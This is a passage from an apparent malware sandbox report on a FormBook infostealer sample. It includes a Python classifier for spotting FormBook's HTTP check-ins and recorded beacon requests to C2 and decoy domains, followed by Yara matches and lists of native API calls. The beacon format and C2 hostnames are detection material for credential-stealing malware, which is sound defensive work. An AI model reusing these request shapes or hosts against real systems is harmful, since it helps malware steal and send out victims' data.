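    "Host: www.worldsourcecloud.com\r\nConnection: close\r\n\r\n",
    "GET /nsag/?Ntfttf=nlvt&Bd68427=1KNBKkR/3sxsfy5Hm2m4k9rliP52H6WM2eUoblDVMc3evr5lbTgPZczIDguYEb443quL HTTP/1.1\r\n"
    "Host: www.tencenttexts.com\r\nConnection: close\r\n\r\n",
    "GET /nsag/?Bd68427=HzZPNJQ+T/L7/MBs4vfaT6k2sBckkYigm/Q2Kch6th6kZXuKq++LfRIjkyQoyiPFVyMQ&Ntfttf=nlvt HTTP/1.1\r\n"
    "Host: www.glowtheblog.com\r\nConnection: close\r\n\r\n",
    "GET /nsag/?Ntfttf=nlvt&Bd68427=AXehkXJ24fX3Q+umAOPXC/XvfFX0gl1EYu2dc8RW2os5zkvGOL3BkU/yF/W58Bsr/nBR HTTP/1.1\r\n"
    "Host: www.myfeezinc.com\r\nConnection: close\r\n\r\n",
    "GET /nsag/?Ntfttf=nlvt&Bd68427=S2rwVw3s97Y3rUXATn0CJ3djiO7xqRLsdPZLFd7esiUzXfKx0EjNJIkpU7K33DVUY0dk HTTP/1.1\r\n"
    "Host: www.wholesalerbargains.com\r\nConnection: close\r\n\r\n",
    # Constructed benign request to the same decoy domain.
    "GET /index.html HTTP/1.1\r\nHost: www.worldsourcecloud.com\r\n"
    "User-Agent: Mozilla/5.0\r\nConnection: close\r\n\r\n",
]

# FormBook's encrypted check-in blob: long, base64 alphabet, at most two '='.
B64ISH = re.compile(r"^[A-Za-z0-9+/]{40,}={0,2}$")


def strip_www(host):
    host = host.lower().rstrip(".")
    return host[4:] if host.startswith("www.") else host


def c2_targets(config):
    """Hosts and URI paths to watch. Decoys are contacted on the same path as
    the real C2, so they are folded into the host set."""
    hosts, paths = set(), set()
    for url in config["C2 list"]:
        host, _, path = url.partition("/")
        hosts.add(strip_www(host))
        paths.add("/" + path)
    hosts.update(strip_www(d) for d in config["decoy"])
    return hosts, paths


def parse_request(raw):
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    path, _, query = target.partition("?")
    # Split by hand: urllib's parse_qs would turn '+' in the blob into spaces.
    params = dict(kv.partition("=")[::2] for kv in query.split("&") if kv)
    return method, path, params, headers


def classify(raw, config=CONFIG):
    """Return ('formbook_checkin' | 'no_match', [reasons])."""
    hosts, paths = c2_targets(config)
    method, path, params, headers = parse_request(raw)
    reasons = []
    if method == "GET" and path in paths:
        reasons.append("request path matches C2 path")
    if strip_www(headers.get("host", "")) in hosts:
        reasons.append("Host is the C2 or a configured decoy")
    if "user-agent" not in headers:
        reasons.append("no User-Agent header")
    if len(params) == 2 and any(B64ISH.match(v) for v in params.values()):
        reasons.append("two query params, one base64-like blob")
    verdict = "formbook_checkin" if len(reasons) == 4 else "no_match"
    return verdict, reasons


if __name__ == "__main__":
    for raw in REQUESTS:
        verdict, reasons = classify(raw)
        print(verdict, "<-", parse_request(raw)[3].get("host"), reasons)
```

All five recorded requests satisfy all four conditions; the constructed request to www.worldsourcecloud.com trips only the host test and stays unflagged, which is the point of requiring the full shape: the decoy domains are chosen to look ordinary and are not necessarily under the operator's control, so a block on host alone would cut legitimate traffic while the path, parameter shape and missing User-Agent are what identify the beacon. Blocking belongs on the real C2 host from the config; the decoys are alerting context.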

E-Banking Fraud:

Yara detected FormBook
Source: Yara match | the same 14 memory-dump and unpacked-PE file sources listed under AV Detection above

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)
          Source: 00000007.00000002.484188593.0000000001320000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.484188593.0000000001320000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.275429619.00000000005E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.275429619.00000000005E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.222946934.00000000022F0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.222946934.00000000022F0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000001.220049197.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000001.220049197.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.482585966.0000000000D90000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.482585966.0000000000D90000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.484311977.0000000001350000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.484311977.0000000001350000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.275240256.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.275240256.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.275382730.0000000000590000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.275382730.0000000000590000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 1.1.Nz7NA3F7z7.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.1.Nz7NA3F7z7.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 1.2.Nz7NA3F7z7.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.Nz7NA3F7z7.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 0.2.Nz7NA3F7z7.exe.22f0000.2.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.Nz7NA3F7z7.exe.22f0000.2.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 1.1.Nz7NA3F7z7.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.1.Nz7NA3F7z7.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 0.2.Nz7NA3F7z7.exe.22f0000.2.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.Nz7NA3F7z7.exe.22f0000.2.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 1.2.Nz7NA3F7z7.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.Nz7NA3F7z7.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_004181C0 NtCreateFile
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00418270 NtReadFile
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_004182F0 NtClose
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_004183A0 NtAllocateVirtualMemory
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_0041817A NtCreateFile
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_004181BA NtCreateFile
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_0041826A NtReadFile
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00B798F0 NtReadVirtualMemory,LdrInitializeThunk
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00B79860 NtQuerySystemInformation,LdrInitializeThunk
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00B79840 NtDelayExecution,LdrInitializeThunk
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00B799A0 NtCreateSection,LdrInitializeThunk
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00B79910 NtAdjustPrivilegesToken,LdrInitializeThunk
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00B79A20 NtResumeThread,LdrInitializeThunk
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00B79A00 NtProtectVirtualMemory,LdrInitializeThunk
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00B79A50 NtCreateFile,LdrInitializeThunk
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00B795D0 NtClose,LdrInitializeThunk
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00B79540 NtReadFile,LdrInitializeThunk
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00B796E0 NtFreeVirtualMemory,LdrInitializeThunk
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00B79660 NtAllocateVirtualMemory,LdrInitializeThunk
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00B797A0 NtUnmapViewOfSection,LdrInitializeThunk
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00B79780 NtMapViewOfSection,LdrInitializeThunk
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00B79FE0 NtCreateMutant,LdrInitializeThunk
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00B79710 NtQueryInformationToken,LdrInitializeThunk
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00B798A0 NtWriteVirtualMemory
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00B79820 NtEnumerateKey
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00B7B040 NtSuspendThread
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00B799D0 NtCreateProcessEx
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00B79950 NtQueueApcThread
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00B79A80 NtOpenDirectoryObject
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00B79A10 NtQuerySection
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00B7A3B0 NtGetContextThread
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00B79B00 NtSetValueKey
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00B795F0 NtQueryInformationFile
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00B7AD30 NtSetContextThread
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00B79520 NtWaitForSingleObject
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00B79560 NtWriteFile
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00B796D0 NtCreateKey
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00B79610 NtEnumerateValueKey
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00B79670 NtQueryInformationProcess
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00B79650 NtQueryValueKey
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00B79730 NtQueryVirtualMemory
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00B7A710 NtOpenProcessToken
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00B79770 NtSetInformationFile
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00B7A770 NtOpenThread
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00B79760 NtOpenProcess
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_1_004181C0 NtCreateFile
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_1_00418270 NtReadFile
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_1_004182F0 NtClose
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_1_004183A0 NtAllocateVirtualMemory
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_1_0041817A NtCreateFile
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_1_004181BA NtCreateFile
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_1_0041826A NtReadFile
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_04F595D0 NtClose,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_04F59540 NtReadFile,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_04F596E0 NtFreeVirtualMemory,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_04F596D0 NtCreateKey,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_04F59660 NtAllocateVirtualMemory,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_04F59650 NtQueryValueKey,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_04F59FE0 NtCreateMutant,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_04F59780 NtMapViewOfSection,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_04F59710 NtQueryInformationToken,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_04F59860 NtQuerySystemInformation,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_04F59840 NtDelayExecution,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_04F599A0 NtCreateSection,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_04F59910 NtAdjustPrivilegesToken,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_04F59A50 NtCreateFile,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_04F595F0 NtQueryInformationFile
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_04F59560 NtWriteFile
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_04F5AD30 NtSetContextThread
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_04F59520 NtWaitForSingleObject
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_04F59670 NtQueryInformationProcess
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_04F59610 NtEnumerateValueKey
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_04F597A0 NtUnmapViewOfSection
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_04F5A770 NtOpenThread
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_04F59770 NtSetInformationFile
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_04F59760 NtOpenProcess
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_04F59730 NtQueryVirtualMemory
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_04F5A710 NtOpenProcessToken
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_04F598F0 NtReadVirtualMemory
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_04F598A0 NtWriteVirtualMemory
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_04F5B040 NtSuspendThread
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_04F59820 NtEnumerateKey
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_04F599D0 NtCreateProcessEx
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_04F59950 NtQueueApcThread
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_04F59A80 NtOpenDirectoryObject
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_04F59A20 NtResumeThread
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_04F59A10 NtQuerySection
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_04F59A00 NtProtectVirtualMemory
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_04F5A3B0 NtGetContextThread
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_04F59B00 NtSetValueKey
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_00DA81C0 NtCreateFile
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_00DA82F0 NtClose
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_00DA8270 NtReadFile
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_00DA83A0 NtAllocateVirtualMemory
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_00DA81BA NtCreateFile
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_00DA817A NtCreateFile
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_00DA826A NtReadFile
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 0_2_0040312A EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 0_2_00406354
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 0_2_00404802
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 0_2_00406B2B
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_0041B808
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00401030
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_0041A2AA
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_0041BBA8
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00408C60
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_0041BD28
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00402D8E
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00402D90
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_0041C785
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00402FB0
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00B620A0
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00B4B090
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00C028EC
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00C020A8
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00BF1002
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00C0E824
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00B54120
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00B3F900
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00C022AE
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00B6EBB0
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00BF03DA
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00BFDBD2
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00C02B28
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00B4841F
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00BFD466
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00C025DD
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00B62581
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00B4D5E0
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00B30D20
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00C01D55
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00C02D07
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00C02EF7
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00B56E30
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00BFD616
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00C0DFCE
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00C01FF1
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_1_0041B808
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_1_00401030
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_04FDD466
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_04F2841F
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_04F2D5E0
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_04FE25DD
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_04F42581
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_04FE1D55
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_04F10D20
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_04FE2D07
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_04FE2EF7
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_04F36E30
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_04FDD616
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_04FE1FF1
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_04FEDFCE
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_04FE28EC
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_04F420A0
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_04FE20A8
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_04F2B090
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_04FEE824
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_04FD1002
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_04F34120
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_04F1F900
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_04FE22AE
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_04FCFA2B
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_04FD03DA
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_04FDDBD2
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_04F4EBB0
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_04F3AB40
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_04FE2B28
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_00DAA2AA
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_00D98C60
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_00D92D90
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_00D92D8E
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_00DAC785
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_00D92FB0
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: String function: 04F1B150 appears 45 times
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: String function: 00B3B150 appears 39 times
          Source: Nz7NA3F7z7.exe, 00000000.00000003.218025103.0000000002C2F000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs Nz7NA3F7z7.exe
          Source: Nz7NA3F7z7.exe, 00000001.00000002.275560525.0000000000673000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenamecolorcpl.exej% vs Nz7NA3F7z7.exe
          Source: Nz7NA3F7z7.exe, 00000001.00000002.275858832.0000000000C2F000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs Nz7NA3F7z7.exe
          Source: Nz7NA3F7z7.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: 00000007.00000002.484188593.0000000001320000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1, date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.484188593.0000000001320000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook, author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.275429619.00000000005E0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1, date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.275429619.00000000005E0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook, author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.222946934.00000000022F0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1, date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
